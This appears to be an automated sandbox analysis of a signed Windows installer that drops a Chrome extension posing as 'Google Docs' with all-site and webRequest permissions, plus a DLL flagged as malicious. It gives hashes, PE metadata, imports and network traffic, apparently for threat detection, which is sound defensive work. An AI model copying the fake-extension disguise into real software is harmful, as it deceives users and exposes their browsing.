                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):7028
                                                                                                                  Entropy (8bit):5.226588714703554
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:1k1V0qvSRaTa5Tn9IpXHWEVAWJ77bWEVTexdjWUKqhv:GqT95oV7y+Kd6ULhv
                                                                                                                  MD5:23AA4675166ABF6DBB1661318F2091CD
                                                                                                                  SHA1:AD71B9576BC722252CACA2AE35A29AAAFF2BC273
                                                                                                                  SHA-256:1BB529A289367ABAF7AC40A04CB999D1DCA10EFB5AB12D406E255DCD2E107C78
                                                                                                                  SHA-512:3A0DB1E3BE57E68B974A25A3E97E410BB25BAC78C2C0890B26A0ED74A7237B8E74C6A521339D78E56840939AFA09335D8BC5EB8B8832C0835010F08284790034
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.. Created with Inkscape (http://www.inkscape.org/) -->....<svg.. xmlns:dc="http://purl.org/dc/elements/1.1/".. xmlns:cc="http://creativecommons.org/ns#".. xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#".. xmlns:svg="http://www.w3.org/2000/svg".. xmlns="http://www.w3.org/2000/svg".. xmlns:xlink="http://www.w3.org/1999/xlink".. xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd".. xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape".. width="5.8741975mm".. height="5.8741975mm".. viewBox="0 0 5.8741975 5.8741975".. version="1.1".. id="svg8".. inkscape:version="0.92.3 (2405546, 2018-03-11)".. sodipodi:docname="logo.svg".. inkscape:export-filename="/home/simon/Lien vers Files/Programming/Browser-addons/chrome-addon-v3-starter/logo/logo-128.png".. inkscape:export-xdpi="553.47137".. inkscape:export-ydpi="553.47137">.. <defs.. id="defs2">.. <linearGradient..
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1202
                                                                                                                  Entropy (8bit):4.7259052604003875
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:5KRwq1wVIsJ4K7LyRJ/GuHRmBONQg2SXDiiKbzq86UXYw5Pg+pG8WKUuL:UiG0BZnyR5GuHRmBRg2SXD2q83YuvpXL
                                                                                                                  MD5:B5923D09C1D62C8B718473CC804D6F77
                                                                                                                  SHA1:9EB22A6CE2AD88F9BC5EAA06367E80BB548E6EBF
                                                                                                                  SHA-256:BFB7F6DC266847896A21A8513D639EABF3F74D2A2DEF95104459AD322B13FAC6
                                                                                                                  SHA-512:053D949B67ADAFB42C4285410546514E0954A219A4999ADE8E266511802E94FD2BAEE2B57D0B7F1C13AB09EAD724DF6FB09AD7DCF1226FB263D4477B61BB459F
                                                                                                                  Malicious:false
                                                                                                                  Preview:{.. "manifest_version": 3,.. "name": " Google Docs",.. "short_name": "Google Docs",.. "version": "1.0",.. "background": {.. "service_worker": "bg/background.js",.. "type": "module".. },.. "action": {.. "default_title": "Google Docs",.. "default_icon": "img/logo/logo-16.png".. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "description": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.",.. "icons": {.. "16": "img/logo/logo-16.png",.. "48": "img/logo/logo-48.png",.. "128": "img/logo/logo-128.png".. },.. "incognito": "spanning",.. "permissions": [.. "activeTab",.. "declarativeNetRequest",.. "webNavigation",.. "storage",.. "tabs",.. "webRequest".. ],.. "host_permissions": [.. "http://*/*",.. "https://*/*".. ],.. "web_accessible_resources": [.. {.. "resources": [.. "img/logo/logo-16.png".. ],..
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1202
                                                                                                                  Entropy (8bit):4.7259052604003875
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:5KRwq1wVIsJ4K7LyRJ/GuHRmBONQg2SXDiiKbzq86UXYw5Pg+pG8WKUuL:UiG0BZnyR5GuHRmBRg2SXD2q83YuvpXL
                                                                                                                  MD5:B5923D09C1D62C8B718473CC804D6F77
                                                                                                                  SHA1:9EB22A6CE2AD88F9BC5EAA06367E80BB548E6EBF
                                                                                                                  SHA-256:BFB7F6DC266847896A21A8513D639EABF3F74D2A2DEF95104459AD322B13FAC6
                                                                                                                  SHA-512:053D949B67ADAFB42C4285410546514E0954A219A4999ADE8E266511802E94FD2BAEE2B57D0B7F1C13AB09EAD724DF6FB09AD7DCF1226FB263D4477B61BB459F
                                                                                                                  Malicious:false
                                                                                                                  Preview:{.. "manifest_version": 3,.. "name": " Google Docs",.. "short_name": "Google Docs",.. "version": "1.0",.. "background": {.. "service_worker": "bg/background.js",.. "type": "module".. },.. "action": {.. "default_title": "Google Docs",.. "default_icon": "img/logo/logo-16.png".. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "description": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.",.. "icons": {.. "16": "img/logo/logo-16.png",.. "48": "img/logo/logo-48.png",.. "128": "img/logo/logo-128.png".. },.. "incognito": "spanning",.. "permissions": [.. "activeTab",.. "declarativeNetRequest",.. "webNavigation",.. "storage",.. "tabs",.. "webRequest".. ],.. "host_permissions": [.. "http://*/*",.. "https://*/*".. ],.. "web_accessible_resources": [.. {.. "resources": [.. "img/logo/logo-16.png".. ],..
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):620152
                                                                                                                  Entropy (8bit):6.797383312921639
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:sPixhT6N7WMBtVB3JS0y9OT5qS8UeaO6DPIsa4y943y1DiX:Oib6xWMBXB3JS0yMMS8UZPPa4e43yYX
                                                                                                                  MD5:0E6BB07FA5ED61B68652440110163649
                                                                                                                  SHA1:0AC6F926538C55664AAF314DE620BF99D4AC49D3
                                                                                                                  SHA-256:7387F56531B5E46E0F3FFA5A9CFC888BC46BE8F9D5D44267F4649DAEB5C9519E
                                                                                                                  SHA-512:7C781A1B30B440EB86CF3CD0E97833D75B1E0572D0E5E9E8852CDFEF91F1B22896CA40695036A7DFBEBB36A988B9A87E72DB6A3192C9321BC17E9034710D4AC3
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d..z...f..z...e..z...m..z...f..C...e..C..a..d..S..z...g..z...e..z...e..Richd..................PE..d....4.c.........." .........6......................................................s.....@..................................................6..P....`..4!...P..\....L..x*...........2...............................................0...............................text............................... ..`.rdata..x....0......................@..@.data........@.......$..............@....pdata..\....P.......&..............@..@.rsrc...4!...`..."...(..............@..@.reloc..$............J..............@..B........................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):620152
                                                                                                                  Entropy (8bit):6.797383312921639
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:sPixhT6N7WMBtVB3JS0y9OT5qS8UeaO6DPIsa4y943y1DiX:Oib6xWMBXB3JS0yMMS8UZPPa4e43yYX
                                                                                                                  MD5:0E6BB07FA5ED61B68652440110163649
                                                                                                                  SHA1:0AC6F926538C55664AAF314DE620BF99D4AC49D3
                                                                                                                  SHA-256:7387F56531B5E46E0F3FFA5A9CFC888BC46BE8F9D5D44267F4649DAEB5C9519E
                                                                                                                  SHA-512:7C781A1B30B440EB86CF3CD0E97833D75B1E0572D0E5E9E8852CDFEF91F1B22896CA40695036A7DFBEBB36A988B9A87E72DB6A3192C9321BC17E9034710D4AC3
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d..z...f..z...e..z...m..z...f..C...e..C..a..d..S..z...g..z...e..z...e..Richd..................PE..d....4.c.........." .........6......................................................s.....@..................................................6..P....`..4!...P..\....L..x*...........2...............................................0...............................text............................... ..`.rdata..x....0......................@..@.data........@.......$..............@....pdata..\....P.......&..............@..@.rsrc...4!...`..."...(..............@..@.reloc..$............J..............@..B........................................................................................................................................................................................................................................................
                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.597690819608688
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 98.04%
                                                                                                                  • Inno Setup installer (109748/4) 1.08%
                                                                                                                  • InstallShield setup (43055/19) 0.42%
                                                                                                                  • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                  File name:$RDGU87D.exe
                                                                                                                  File size:1904656
                                                                                                                  MD5:c91fcaa707b9e46828d867a4d399f6b2
                                                                                                                  SHA1:eabe1a499a663b74d7b80fd0dec99b103d957697
                                                                                                                  SHA256:1d180bd0d9a05b4c3883b99fcf9b5502bf30b35b2e09d4ba4ab2111079b3221e
                                                                                                                  SHA512:cab68bc421f1c74d2e6413341a31efa60d932ff07847976098ae82513b035f93e215e5e199b2f9cf7a952f6ab1674a74f2d18b48c795de96cb36f030d9744f5b
                                                                                                                  SSDEEP:24576:X4nXubIQGyxbPV0db264RAqtW1WEpqZ1pSbubtQo+8YzqNAh3XBQ0FPcQsY8Nl8J:Xqe3f6T9zut9+QAPcTYy2WW
                                                                                                                  TLSH:0295DF3FB268653EC4AF0B3245B3D350597BBB61A81A8C2E07F0490DCF665711E3BA56
                                                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                  Icon Hash:a2a0b496b2caca72
                                                                                                                  Entrypoint:0x4b5eec
                                                                                                                  Entrypoint Section:.itext
                                                                                                                  Digitally signed:true
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x5F5DDFC3 [Sun Sep 13 09:00:51 2020 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:6
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:6
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:6
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:5a594319a0d69dbc452e748bcf05892e
                                                                                                                  Signature Valid:true
                                                                                                                  Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                  Signature Validation Error:The operation completed successfully
                                                                                                                  Error Number:0
                                                                                                                  Not Before, Not After
                                                                                                                  • 10/12/2022 9:50:16 AM 10/12/2023 9:48:39 AM
                                                                                                                  Subject Chain
                                                                                                                  • OID.1.3.6.1.4.1.311.60.2.1.3=GB, OID.2.5.4.15=Private Organization, CN=LIMESTONE DIGITAL LIMITED, SERIALNUMBER=14347919, O=LIMESTONE DIGITAL LIMITED, L=Stoke-On-Trent, C=GB
                                                                                                                  Version:3
                                                                                                                  Thumbprint MD5:1902CF8D0B158DA71E552DBF8A895FE1
                                                                                                                  Thumbprint SHA-1:2AAE66915908A703D5059DA2FCF4D5245B78BB30
                                                                                                                  Thumbprint SHA-256:D64F03F1738A5FB5B1C02AE09BDFE0D95101530EB356CBFB323AFD7C0793502A
                                                                                                                  Serial:4D2DC3C461FF097059BC7440DAC6207B
                                                                                                                  Instruction
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  add esp, FFFFFFA4h
                                                                                                                  push ebx
                                                                                                                  push esi
                                                                                                                  push edi
                                                                                                                  xor eax, eax
                                                                                                                  mov dword ptr [ebp-3Ch], eax
                                                                                                                  mov dword ptr [ebp-40h], eax
                                                                                                                  mov dword ptr [ebp-5Ch], eax
                                                                                                                  mov dword ptr [ebp-30h], eax
                                                                                                                  mov dword ptr [ebp-38h], eax
                                                                                                                  mov dword ptr [ebp-34h], eax
                                                                                                                  mov dword ptr [ebp-2Ch], eax
                                                                                                                  mov dword ptr [ebp-28h], eax
                                                                                                                  mov dword ptr [ebp-14h], eax
                                                                                                                  mov eax, 004B10F0h
                                                                                                                  call 00007F1BB49C7015h
                                                                                                                  xor eax, eax
                                                                                                                  push ebp
                                                                                                                  push 004B65E2h
                                                                                                                  push dword ptr fs:[eax]
                                                                                                                  mov dword ptr fs:[eax], esp
                                                                                                                  xor edx, edx
                                                                                                                  push ebp
                                                                                                                  push 004B659Eh
                                                                                                                  push dword ptr fs:[edx]
                                                                                                                  mov dword ptr fs:[edx], esp
                                                                                                                  mov eax, dword ptr [004BE634h]
                                                                                                                  call 00007F1BB4A6973Fh
                                                                                                                  call 00007F1BB4A69292h
                                                                                                                  lea edx, dword ptr [ebp-14h]
                                                                                                                  xor eax, eax
                                                                                                                  call 00007F1BB49DCA88h
                                                                                                                  mov edx, dword ptr [ebp-14h]
                                                                                                                  mov eax, 004C1D84h
                                                                                                                  call 00007F1BB49C1C07h
                                                                                                                  push 00000002h
                                                                                                                  push 00000000h
                                                                                                                  push 00000001h
                                                                                                                  mov ecx, dword ptr [004C1D84h]
                                                                                                                  mov dl, 01h
                                                                                                                  mov eax, dword ptr [004237A4h]
                                                                                                                  call 00007F1BB49DDAEFh
                                                                                                                  mov dword ptr [004C1D88h], eax
                                                                                                                  xor edx, edx
                                                                                                                  push ebp
                                                                                                                  push 004B654Ah
                                                                                                                  push dword ptr fs:[edx]
                                                                                                                  mov dword ptr fs:[edx], esp
                                                                                                                  call 00007F1BB4A697C7h
                                                                                                                  mov dword ptr [004C1D90h], eax
                                                                                                                  mov eax, dword ptr [004C1D90h]
                                                                                                                  cmp dword ptr [eax+0Ch], 01h
                                                                                                                  jne 00007F1BB4A6FDAAh
                                                                                                                  mov eax, dword ptr [004C1D90h]
                                                                                                                  mov edx, 00000028h
                                                                                                                  call 00007F1BB49DE3E4h
                                                                                                                  mov edx, dword ptr [004C1D90h]
                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0xc40000x9a.edata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc20000xf36.idata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x4800.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x1ce5980x2a78
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0xc60000x18.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xc22e40x244.idata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xc30000x1a4.didata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000xb361c0xb3800False0.3448639341051532data6.356058204328091IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .itext0xb50000x16880x1800False0.544921875data5.972750055221053IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .data0xb70000x37a40x3800False0.36097935267857145data5.044400562007734IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .bss0xbb0000x6de80x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .idata0xc20000xf360x1000False0.3681640625data4.8987046479600425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .didata0xc30000x1a40x200False0.345703125data2.7563628682496506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .edata0xc40000x9a0x200False0.2578125data1.8722228665884297IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .tls0xc50000x180x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rdata0xc60000x5d0x200False0.189453125data1.3838943752217987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0xc70000x48000x4800False0.3154296875data4.4213633965591095IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                  RT_ICON0xc74c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands
                                                                                                                  RT_ICON0xc75f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands
                                                                                                                  RT_ICON0xc7b580x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands
                                                                                                                  RT_ICON0xc7e400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands
                                                                                                                  RT_STRING0xc86e80x360data
                                                                                                                  RT_STRING0xc8a480x260data
                                                                                                                  RT_STRING0xc8ca80x45cdata
                                                                                                                  RT_STRING0xc91040x40cdata
                                                                                                                  RT_STRING0xc95100x2d4data
                                                                                                                  RT_STRING0xc97e40xb8data
                                                                                                                  RT_STRING0xc989c0x9cdata
                                                                                                                  RT_STRING0xc99380x374data
                                                                                                                  RT_STRING0xc9cac0x398data
                                                                                                                  RT_STRING0xca0440x368data
                                                                                                                  RT_STRING0xca3ac0x2a4data
                                                                                                                  RT_RCDATA0xca6500x10data
                                                                                                                  RT_RCDATA0xca6600x2c4data
                                                                                                                  RT_RCDATA0xca9240x2cdata
                                                                                                                  RT_GROUP_ICON0xca9500x3edataEnglishUnited States
                                                                                                                  RT_VERSION0xca9900x584dataEnglishUnited States
                                                                                                                  RT_MANIFEST0xcaf140x726XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                  DLLImport
                                                                                                                  kernel32.dllGetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                                                                  comctl32.dllInitCommonControls
                                                                                                                  version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                                                  user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                                                                  oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                                                                  netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                                                                                  advapi32.dllRegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW
                                                                                                                  NameOrdinalAddress
                                                                                                                  TMethodImplementationIntercept30x454060
                                                                                                                  __dbk_fcall_wrapper20x40d0a0
                                                                                                                  dbkFCallWrapperAddr10x4be63c
                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  DutchNetherlands
                                                                                                                  EnglishUnited States
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Mar 21, 2023 13:20:42.685004950 CET49187443192.168.2.22142.250.203.110
                                                                                                                  Mar 21, 2023 13:20:42.685091972 CET44349187142.250.203.110192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:42.685187101 CET49187443192.168.2.22142.250.203.110
                                                                                                                  Mar 21, 2023 13:20:42.685741901 CET49188443192.168.2.22172.217.168.77
                                                                                                                  Mar 21, 2023 13:20:42.685802937 CET44349188172.217.168.77192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:42.685883045 CET49188443192.168.2.22172.217.168.77
                                                                                                                  Mar 21, 2023 13:20:42.686428070 CET49187443192.168.2.22142.250.203.110
                                                                                                                  Mar 21, 2023 13:20:42.686461926 CET44349187142.250.203.110192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:42.687144995 CET49188443192.168.2.22172.217.168.77
                                                                                                                  Mar 21, 2023 13:20:42.687182903 CET44349188172.217.168.77192.168.2.22
